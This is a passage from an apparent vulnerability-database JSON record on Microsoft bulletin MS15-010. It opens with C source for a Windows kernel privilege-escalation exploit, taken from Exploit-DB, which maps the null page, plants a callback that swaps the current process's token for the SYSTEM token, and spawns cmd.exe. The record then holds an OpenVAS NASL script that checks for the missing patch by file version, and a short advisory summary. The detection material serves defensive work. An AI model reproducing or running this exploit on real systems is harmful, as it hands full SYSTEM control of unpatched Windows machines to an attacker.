LocalAlloc( LMEM_ZEROINIT, len );\r\n\t\tif( !pm ) __leave;\r\n\t\tstatus = ZwQuerySystemInformation( SystemModuleInformation, pm, len, &len );\r\n\t\tif( status ) __leave;\r\n\r\n\t\tCHAR szKrnl[MAX_PATH] = { 0 }, *t;\r\n\r\n\t\tfor( ULONG i = 0; i < pm->Count; ++i )\r\n\t\t{\r\n\t\t\tif( strstr( pm->Module[i].ImageName, \"exe\" ) )\r\n\t\t\t{\r\n\t\t\t\tt = strstr( pm->Module[i].ImageName, \"nt\" );\r\n\t\t\t\tif( t )\r\n\t\t\t\t{\r\n\t\t\t\t\tstrcpy_s( szKrnl, _countof( szKrnl ) - 1, t );\r\n\t\t\t\t\tBase = pm->Module[i].Base;\r\n\t\t\t\t\tbreak;\r\n\t\t\t\t}\r\n\t\t\t}\r\n\t\t}\r\n\r\n\t\thMod = LoadLibraryA( szKrnl );\r\n\r\n\t\tif( !hMod || !Base ) __leave;\r\n\t\t\r\n\t\tPsLookupProcessByProcessId = ( _PsLookupProcessByProcessId ) GetProcAddress( hMod, \"PsLookupProcessByProcessId\" );\r\n\t\tif( !PsLookupProcessByProcessId ) __leave;\r\n\r\n\t\tPsLookupProcessByProcessId = ( _PsLookupProcessByProcessId ) ( ( DWORD_PTR ) Base + ( ( DWORD_PTR ) PsLookupProcessByProcessId - ( DWORD_PTR ) hMod ) );\r\n\r\n\t\tPsReferencePrimaryToken = ( _PsReferencePrimaryToken ) GetProcAddress( hMod, \"PsReferencePrimaryToken\" );\r\n\r\n\t\tif( !PsReferencePrimaryToken ) __leave;\r\n\r\n\t\tPsReferencePrimaryToken = ( _PsReferencePrimaryToken ) ( ( DWORD_PTR ) Base + ( ( DWORD_PTR ) PsReferencePrimaryToken - ( DWORD_PTR ) hMod ) );\r\n\t\tPid = GetCurrentProcessId();\r\n\t\tRetVal = TRUE;\r\n\t}\r\n\r\n\t__finally {\r\n\t\tif( pm ) LocalFree( pm );\r\n\t\tif( hMod ) FreeLibrary( hMod );\r\n\t}\r\n\r\n\treturn RetVal;\r\n}\r\n\r\nLRESULT CALLBACK ShellCode( HWND hWnd, UINT uMsg, WPARAM wParam, LPARAM lParam )\r\n{\r\n\tLPVOID pCurProcess = NULL;\r\n\tLPVOID pSystemInfo = NULL;\r\n\tPACCESS_TOKEN systemToken;\r\n\tPACCESS_TOKEN targetToken;\r\n\r\n\tPsLookupProcessByProcessId( ( HANDLE ) Pid, &pCurProcess );\r\n\tPsLookupProcessByProcessId( ( HANDLE ) 4, &pSystemInfo );\r\n\r\n\ttargetToken = PsReferencePrimaryToken( pCurProcess );\r\n\tsystemToken = PsReferencePrimaryToken( pSystemInfo );\r\n\r\n\t//\r\n\tfind_and_replace_member( ( PDWORD_PTR ) pCurProcess,\r\n\t\t( DWORD_PTR ) targetToken,\r\n\t\t( DWORD_PTR ) systemToken,\r\n\t\t0x200 );\r\n\tKrnlMode = TRUE;\r\n\treturn 0;\r\n}\r\n\r\nVOID WINAPI leave()\r\n{\r\n\tkeybd_event( VK_ESCAPE, 0, 0, NULL );\r\n\tkeybd_event( VK_ESCAPE, 0, KEYEVENTF_KEYUP, NULL );\r\n\tkeybd_event( VK_LWIN, 0, KEYEVENTF_KEYUP, NULL );\r\n}\r\n\r\nLRESULT CALLBACK WndProc( HWND hWnd, UINT message, WPARAM wParam, LPARAM lParam )\r\n{\r\n\tif( bSpawned )\r\n\t{\r\n\t\tleave();\r\n\t\tExitProcess( 0 );\r\n\t}\r\n\r\n\tswitch( message )\r\n\t{\r\n\tcase WM_CREATE:\r\n\t\tSetTimer( hWnd, ID_TIMER, 1000 * 3, NULL );\r\n\t\tFlashWindow( hWnd, TRUE );\r\n\t\tkeybd_event( VK_LWIN, 0, 0, NULL );\r\n\t\tbreak;\r\n\tcase WM_CLOSE:\r\n\t\tDestroyWindow( hWnd );\r\n\t\tbreak;\r\n\tcase WM_DESTROY:\r\n\t\tPostQuitMessage( 0 );\r\n\t\tbreak;\r\n\tcase WM_TIMER:\r\n\t\tKillTimer( hWnd, ID_TIMER );\r\n\t\tleave();\r\n\t\tDestroyWindow( hWnd );\r\n\t\tbreak;\r\n\tdefault:\r\n\t\treturn DefWindowProc( hWnd, message, wParam, lParam );\r\n\t}\r\n\treturn 0;\r\n}\r\n\r\nint APIENTRY _tWinMain( _In_ HINSTANCE hInstance,\r\n\t_In_opt_ HINSTANCE hPrevInstance,\r\n\t_In_ LPTSTR lpCmdLine,\r\n\t_In_ int nCmdShow )\r\n{\r\n\tWNDCLASSEX wc = { sizeof( WNDCLASSEX ) };\r\n\tHWND hWnd = NULL;\r\n\tMSG Msg = { 0 };\r\n\r\n\tSIZE_T size = 0x1000;\r\n\tLPVOID addr = ( LPVOID ) 1;\r\n\r\n\tif( !Init() ) return 1;\r\n\t\r\n\tif( ZwAllocateVirtualMemory( ( HANDLE ) -1, &addr, 0, &size, MEM_COMMIT | MEM_RESERVE | MEM_TOP_DOWN, PAGE_EXECUTE_READWRITE ) )\r\n\t{\r\n\t\t//\r\n\t\treturn 1;\r\n\t}\r\n\r\n\tDWORD_PTR p = pti();\r\n\tif( !p ) return 1;\r\n\r\n#ifdef _M_X64\r\n\t*( ( PDWORD_PTR ) 0x10 ) = p;\r\n\t*( ( LPBYTE ) 0x2a ) = 4;\r\n\t*( ( LPVOID* ) 0x90 ) = ( LPVOID ) ShellCode;\r\n\t*( ( PDWORD_PTR ) 0xa8 ) = 0x400;\r\n\t*( ( LPDWORD ) 0x404 ) = 1;\r\n\t*( ( PDWORD_PTR ) 0x408 ) = 0x800;\r\n\t*( ( LPWORD ) 0x410 ) = atom;\r\n\t*( ( LPBYTE ) 0x412 ) = 1;\r\n#else\r\n\t*( ( LPDWORD ) 0x08 ) = p;\r\n\t*( ( LPBYTE ) 0x16 ) = 4;\r\n\t*( ( LPVOID* ) 0x60 ) = ( LPVOID ) ShellCode;\r\n\t*( ( LPDWORD ) 0x6c ) = 0x400;\r\n\t*( ( LPDWORD ) 0x404 ) = 1;\r\n\t*( ( LPDWORD ) 0x408 ) = 0x800;\r\n\t*( ( LPWORD ) 0x40c ) = atom;\r\n\t*( ( LPBYTE ) 0x40e ) = 1;\r\n#endif\r\n\r\n\twc.lpfnWndProc = WndProc;\r\n\twc.hInstance = hInstance;\r\n\twc.lpszClassName = TEXT( \"Class\" );\r\n\t\r\n\tif( !RegisterClassEx( &wc ) )\r\n\t\treturn 1;\r\n\thWnd = CreateWindowEx(\r\n\t\tWS_EX_CLIENTEDGE,\r\n\t\tTEXT( \"Class\" ),\r\n\t\tTEXT( \"Window\" ),\r\n\t\tWS_OVERLAPPEDWINDOW,\r\n\t\tCW_USEDEFAULT, CW_USEDEFAULT, 200, 100,\r\n\t\tNULL, NULL, hInstance, NULL );\r\n\tif( !hWnd )\r\n\t\treturn 1;\r\n\tShowWindow( hWnd, SW_HIDE );\r\n\tUpdateWindow( hWnd );\r\n\r\n\twhile( GetMessage( &Msg, NULL, 0, 0 ) )\r\n\t{\r\n\t\tif ( Msg.message == WM_SYSTIMER ) // Borrowed from http://blog.beyondtrust.com/fuzzing-for-ms15-010\r\n\t\t{\r\n\t\t\tif( !KrnlMode )\r\n\t\t\t{\r\n\t\t\t\tMsg.hwnd = ( HWND ) NULL;\r\n\t\t\t}\r\n\t\t\telse\r\n\t\t\t{\r\n\t\t\t\tMsg.hwnd = hWnd;\r\n\t\t\t\tif( !bSpawned )\r\n\t\t\t\t{\r\n\t\t\t\t\tShellExecute( NULL, TEXT( \"open\" ), TEXT( \"cmd.exe\" ), NULL, NULL, SW_SHOW );\r\n\t\t\t\t\tbSpawned = TRUE;\r\n\t\t\t\t}\r\n\t\t\t}\r\n\t\t}\r\n\r\n\t\tTranslateMessage( &Msg );\r\n\t\tDispatchMessage( &Msg );\r\n\t}\r\n\r\n\treturn ( int ) Msg.wParam;\r\n}\r\n// EOF\r\n\r\n\r\n\r\n\r\n\r\n\r\n//ex.h\r\n\r\n#pragma once\r\n\r\n#include <windows.h>\r\n#include <stdio.h>\r\n#include <tchar.h>\r\n\r\ntypedef NTSTATUS ( WINAPI *_ZwAllocateVirtualMemory ) (\r\n\t_In_ HANDLE ProcessHandle,\r\n\t_Inout_ PVOID *BaseAddress,\r\n\t_In_ ULONG_PTR ZeroBits,\r\n\t_Inout_ PSIZE_T RegionSize,\r\n\t_In_ ULONG AllocationType,\r\n\t_In_ ULONG Protect\r\n\t);\r\n\r\ntypedef NTSTATUS ( WINAPI *_PsLookupProcessByProcessId ) (\r\n\t_In_ HANDLE ProcessId,\r\n\t_Out_ PVOID *Process\r\n\t);\r\n\r\ntypedef PACCESS_TOKEN ( WINAPI *_PsReferencePrimaryToken ) (\r\n\t_Inout_ PVOID Process\r\n\t);\r\n\r\ntypedef enum _SYSTEM_INFORMATION_CLASS {\r\n\tSystemBasicInformation = 0,\r\n\tSystemModuleInformation = 11\r\n} SYSTEM_INFORMATION_CLASS;\r\n\r\ntypedef NTSTATUS ( WINAPI *_ZwQuerySystemInformation ) (\r\n\t_In_ SYSTEM_INFORMATION_CLASS SystemInformationClass,\r\n\t_Inout_ PVOID SystemInformation,\r\n\t_In_ ULONG SystemInformationLength,\r\n\t_Out_opt_ PULONG ReturnLength\r\n\t);\r\n\r\ntypedef struct _SYSTEM_MODULE_INFORMATION_ENTRY {\r\n\tHANDLE Section;\r\n\tPVOID MappedBase;\r\n\tPVOID Base;\r\n\tULONG Size;\r\n\tULONG Flags;\r\n\tUSHORT LoadOrderIndex;\r\n\tUSHORT InitOrderIndex;\r\n\tUSHORT LoadCount;\r\n\tUSHORT PathLength;\r\n\tCHAR ImageName[256];\r\n} SYSTEM_MODULE_INFORMATION_ENTRY, *PSYSTEM_MODULE_INFORMATION_ENTRY;\r\n\r\ntypedef struct _SYSTEM_MODULE_INFORMATION {\r\n\tULONG Count;\r\n\tSYSTEM_MODULE_INFORMATION_ENTRY Module[1];\r\n} SYSTEM_MODULE_INFORMATION, *PSYSTEM_MODULE_INFORMATION;\r\n\r\n#define ID_TIMER 0x1\r\n#define WM_SYSTIMER 0x118\r\n// EOF", "cvss": {"score": 7.2, "vector": "AV:LOCAL/AC:LOW/Au:NONE/C:COMPLETE/I:COMPLETE/A:COMPLETE/"}, "sourceHref": "https://www.exploit-db.com/download/37098/"}], "openvas": [{"lastseen": "2020-06-10T19:51:35", "bulletinFamily": "scanner", "cvelist": ["CVE-2015-0003", "CVE-2015-0057", "CVE-2015-0059", "CVE-2015-0060", "CVE-2015-0010", "CVE-2015-0058"], "description": "This host is missing an critical security\n update according to Microsoft Bulletin MS15-010.", "modified": "2020-06-09T00:00:00", "published": "2015-02-11T00:00:00", "id": "OPENVAS:1361412562310805337", "href": "http://plugins.openvas.org/nasl.php?oid=1361412562310805337", "type": "openvas", "title": "MS Windows Kernel-Mode Driver RCE Vulnerabilities (3036220)", "sourceData": "###############################################################################\n# OpenVAS Vulnerability Test\n#\n# MS Windows Kernel-Mode Driver RCE Vulnerabilities (3036220)\n#\n# Authors:\n# Deependra Bapna <bdeependra@secpod.com>\n#\n# Copyright:\n# Copyright (C) 2015 Greenbone Networks GmbH, http://www.greenbone.net\n#\n# This program is free software; you can redistribute it and/or modify\n# it under the terms of the GNU General Public License version 2\n# (or any later version), as published by the Free Software Foundation.\n#\n# This program is distributed in the hope that it will be useful,\n# but WITHOUT ANY WARRANTY; without even the implied warranty of\n# MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the\n# GNU General Public License for more details.\n#\n# You should have received a copy of the GNU General Public License\n# along with this program; if not, write to the Free Software\n# Foundation, Inc., 51 Franklin St, Fifth Floor, Boston, MA 02110-1301 USA.\n###############################################################################\n\nif(description)\n{\n script_oid(\"1.3.6.1.4.1.25623.1.0.805337\");\n script_version(\"2020-06-09T05:48:43+0000\");\n script_cve_id(\"CVE-2015-0003\", \"CVE-2015-0010\", \"CVE-2015-0057\", \"CVE-2015-0058\",\n \"CVE-2015-0059\", \"CVE-2015-0060\");\n script_bugtraq_id(72457, 72461, 72466, 72468, 72470, 72472);\n script_tag(name:\"cvss_base\", value:\"7.2\");\n script_tag(name:\"cvss_base_vector\", value:\"AV:L/AC:L/Au:N/C:C/I:C/A:C\");\n script_tag(name:\"last_modification\", value:\"2020-06-09 05:48:43 +0000 (Tue, 09 Jun 2020)\");\n script_tag(name:\"creation_date\", value:\"2015-02-11 16:14:14 +0530 (Wed, 11 Feb 2015)\");\n script_name(\"MS Windows Kernel-Mode Driver RCE Vulnerabilities (3036220)\");\n\n script_tag(name:\"summary\", value:\"This host is missing an critical security\n update according to Microsoft Bulletin MS15-010.\");\n\n script_tag(name:\"vuldetect\", value:\"Checks if a vulnerable version is present on the target host.\");\n\n script_tag(name:\"insight\", value:\"The flaw is due to an error within the\n WebDAV kernel-mode driver (mrxdav.sys).\");\n\n script_tag(name:\"impact\", value:\"Successful exploitation will allow remote\n attackers to bypass security and gain restricted privileges.\");\n\n script_tag(name:\"affected\", value:\"- Microsoft Windows 8 x32/x64\n\n - Microsoft Windows Server 2012/R2\n\n - Microsoft Windows 8.1 x32/x64\n\n - Microsoft Windows 2003 x32/x64 Service Pack 2 and prior\n\n - Microsoft Windows Vista x32/x64 Service Pack 2 and prior\n\n - Microsoft Windows Server 2008 x32/x64 Service Pack 2 and prior\n\n - Microsoft Windows 7 x32/x64 Service Pack 1 and prior\n\n - Microsoft Windows Server 2008 R2 x64 Service Pack 1 and prior\");\n\n script_tag(name:\"solution\", value:\"The vendor has released updates. Please see the references for more information.\");\n\n script_tag(name:\"solution_type\", value:\"VendorFix\");\n\n script_tag(name:\"qod_type\", value:\"executable_version\");\n\n script_xref(name:\"URL\", value:\"https://support.microsoft.com/kb/3013455\");\n script_xref(name:\"URL\", value:\"https://support.microsoft.com/kb/3023562\");\n script_xref(name:\"URL\", value:\"https://technet.microsoft.com/library/security/MS15-010\");\n\n script_category(ACT_GATHER_INFO);\n script_copyright(\"Copyright (C) 2015 Greenbone Networks GmbH\");\n script_family(\"Windows : Microsoft Bulletins\");\n script_dependencies(\"smb_reg_service_pack.nasl\");\n script_require_ports(139, 445);\n script_mandatory_keys(\"SMB/WindowsVersion\");\n exit(0);\n}\n\ninclude(\"smb_nt.inc\");\ninclude(\"secpod_reg.inc\");\ninclude(\"version_func.inc\");\ninclude(\"secpod_smb_func.inc\");\n\nif(hotfix_check_sp(win2003:3, win2003x64:3, winVista:3, win7:2, win7x64:2,\n win2008:3, win2008r2:2, win8:1, win8x64:1, win2012:1,\n win2012R2:1, win8_1:1, win8_1x64:1) <= 0){\n exit(0);\n}\n\nsysPath = smb_get_systemroot();\nif(!sysPath ){\n exit(0);\n}\n\n\n##Elevation of Privilege KB3036220\ndllVer = fetch_file_version(sysPath:sysPath, file_name:\"system32\\Win32k.sys\");\nif(!dllVer){\n exit(0);\n}\n\nif(hotfix_check_sp(win2003x64:3,win2003:3) > 0)\n{\n if(version_is_less(version:dllVer, test_version:\"5.2.3790.5513\"))\n {\n security_message( port: 0, data: \"The target host was found to be vulnerable\" );\n exit(0);\n }\n}\n\n## Currently not supporting for Vista and Windows Server 2008 64 bit\nif(hotfix_check_sp(winVista:3, win2008:3) > 0)\n{\n if(version_is_less(version:dllVer, test_version:\"6.0.6002.19279\") ||\n version_in_range(version:dllVer, test_version:\"6.0.6002.23000\", test_version2:\"6.0.6002.23587\"))\n {\n security_message( port: 0, data: \"The target host was found to be vulnerable\" );\n exit(0);\n }\n}\n\nif(hotfix_check_sp(win7:2, win7x64:2, win2008r2:2) > 0)\n{\n if(version_is_less(version:dllVer, test_version:\"6.1.7601.18713\") ||\n version_in_range(version:dllVer, test_version:\"6.1.7601.22000\", test_version2:\"6.1.7601.22918\"))\n {\n security_message( port: 0, data: \"The target host was found to be vulnerable\" );\n exit(0);\n }\n}\n\nif(hotfix_check_sp(win8:1, win8x64:1, win2012:1) > 0)\n{\n if(version_is_less(version:dllVer, test_version:\"6.2.9200.17226\") ||\n version_in_range(version:dllVer, test_version:\"6.2.9200.20000\", test_version2:\"6.2.9200.21342\"))\n {\n security_message( port: 0, data: \"The target host was found to be vulnerable\" );\n exit(0);\n }\n}\n\n## Win 8.1 and win2012R2\nif(hotfix_check_sp(win8_1:1, win8_1x64:1, win2012R2:1) > 0)\n{\n if(version_is_less(version:dllVer, test_version:\"6.3.9600.17630\"))\n {\n security_message( port: 0, data: \"The target host was found to be vulnerable\" );\n exit(0);\n }\n}\n\n\n##Security Feature Bypass KB3023562\ndllVer = fetch_file_version(sysPath:sysPath, file_name:\"system32\\Msv1_0.dll\");\nif(!dllVer){\n exit(0);\n}\n\nif(hotfix_check_sp(win2003x64:3,win2003:3) > 0)\n{\n if(version_is_less(version:dllVer, test_version:\"5.2.3790.4587\"))\n {\n security_message( port: 0, data: \"The target host was found to be vulnerable\" );\n exit(0);\n }\n}\n\n## Currently not supporting for Vista and Windows Server 2008 64 bit\nif(hotfix_check_sp(winVista:3, win2008:3) > 0)\n{\n if(version_is_less(version:dllVer, test_version:\"6.0.6002.18111\") ||\n version_in_range(version:dllVer, test_version:\"6.0.6002.23000\", test_version2:\"6.0.6002.23593\"))\n {\n security_message( port: 0, data: \"The target host was found to be vulnerable\" );\n exit(0);\n }\n}\n\nif(hotfix_check_sp(win7:2, win7x64:2, win2008r2:1) > 0)\n{\n if(version_is_less(version:dllVer, test_version:\"6.1.7601.18606\") ||\n version_in_range(version:dllVer, test_version:\"6.1.7601.22000\", test_version2:\"6.1.7601.22615\"))\n {\n security_message( port: 0, data: \"The target host was found to be vulnerable\" );\n exit(0);\n }\n}\n\nif(hotfix_check_sp(win8:1, win8x64:1, win2012:1) > 0)\n{\n if(version_is_less(version:dllVer, test_version:\"6.2.9200.16891\") ||\n version_in_range(version:dllVer, test_version:\"6.2.9200.20000\", test_version2:\"6.2.9200.21011\"))\n {\n security_message( port: 0, data: \"The target host was found to be vulnerable\" );\n exit(0);\n }\n}\n\ndllVer = fetch_file_version(sysPath:sysPath, file_name:\"system32\\Msobjs.dll\");\nif(!dllVer){\n exit(0);\n}\n\n## Win 8.1 and win2012R2\nif(hotfix_check_sp(win8_1:1, win8_1x64:1, win2012R2:1) > 0)\n{\n if(version_is_less(version:dllVer, test_version:\"6.3.9600.16383\"))\n {\n security_message( port: 0, data: \"The target host was found to be vulnerable\" );\n exit(0);\n }\n}\n", "cvss": {"score": 7.2, "vector": "AV:L/AC:L/Au:N/C:C/I:C/A:C"}}], "securityvulns": [{"lastseen": "2018-08-31T11:09:59", "bulletinFamily": "software", "cvelist": ["CVE-2015-0041", "CVE-2015-0044", "CVE-2015-0022", "CVE-2015-0039", "CVE-2015-0003", "CVE-2015-0028", "CVE-2015-0052", "CVE-2015-0018", "CVE-2015-0020", "CVE-2015-0057", "CVE-2015-0059", "CVE-2015-0062", "CVE-2015-0021", "CVE-2015-0030", "CVE-2015-0031", "CVE-2015-0023", "CVE-2015-0035", "CVE-2015-0060", "CVE-2015-0038", "CVE-2015-0019", "CVE-2015-0048", "CVE-2015-0008", "CVE-2015-0026", "CVE-2015-0072", "CVE-2015-0029", "CVE-2015-0010", "CVE-2015-0045", "CVE-2015-0049", "CVE-2015-0017", "CVE-2015-0043", "CVE-2015-0027", "CVE-2015-0009", "CVE-2015-0037", "CVE-2015-0067", "CVE-2015-0068", "CVE-2015-0025", "CVE-2015-0053", "CVE-2015-0036", "CVE-2015-0050", "CVE-2015-0058", "CVE-2015-0046", "CVE-2015-0042", "CVE-2015-0040", "CVE-2014-8967", "CVE-2015-0066", "CVE-2015-0061"], "description": "Multiple Internet Explorer memory corruptions, kernel privilege escalation, group policies code execution and restrictions bypass, process creation privilege escalation, TIFF parsing information leakage.", "edition": 1, "modified": "2015-02-11T00:00:00", "published": "2015-02-11T00:00:00", "id": "SECURITYVULNS:VULN:14254", "href": "https://vulners.com/securityvulns/SECURITYVULNS:VULN:14254", "title": "Microsoft Windows multiple security vulnerabilities", "type": "securityvulns", "cvss": {"score": 9.3, "vector": "AV:NETWORK/AC:MEDIUM/Au:NONE/C:COMPLETE/I:COMPLETE/A:COMPLETE/"}}]}